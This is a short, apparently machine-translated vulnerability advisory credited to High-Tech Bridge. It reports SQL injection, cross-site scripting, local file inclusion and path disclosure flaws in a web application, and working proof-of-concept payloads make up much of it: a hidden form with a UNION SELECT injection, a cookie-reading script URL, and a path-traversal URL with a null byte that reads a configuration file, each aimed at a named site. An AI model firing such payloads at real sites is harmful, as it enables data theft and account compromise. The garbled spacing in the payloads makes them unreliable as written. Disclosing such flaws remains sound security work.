Because this vulnerability exists in the "/index. php" script, the search variable input is provided without filtering. Attackers can modify application SQL statements to query databases, execute arbitrary queries to databases, compromise applications, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
SQL Injection:
POC:
<Form action = "http://www.hackqing.com/index.php? Id = 14 "method =" post "name =" main ">
<Input type = "hidden" name = "search" value = "pentest)/**/union/**/select/**/1, 2, 3, @ version/**/# "/>
<Input type = "submit" value = "submit" name = "submit"/>
</Form>
XSS cross-site:
POC:
Http://www.hackqing.com/manager/index.php? Location = % 22% 3E % 3 Cscript % 3 Ealert % 28document. cookie % 29% 3C/script % 3E
Local files include:
This vulnerability exists in "/manager/actions/static/document_data.static.action.php". remote users can view any local files.
Http://www.hackqing.com/manager/actions/static/document_data.static.action.php? Id =/../shortdes/config. inc. php % 00
Sensitive information leakage: explosion of physical paths
The vulnerability exists in the "/manager/frames/3. php" script and may cause an error, thus unlocking the complete path of the script. Remote users can determine the complete path to the Web root directory and other potential sensitive information.
POC: http://www.hackqing.com/manager/frames/3.php
Form: High-Tech Bridge, organized and edited
Solution: Filter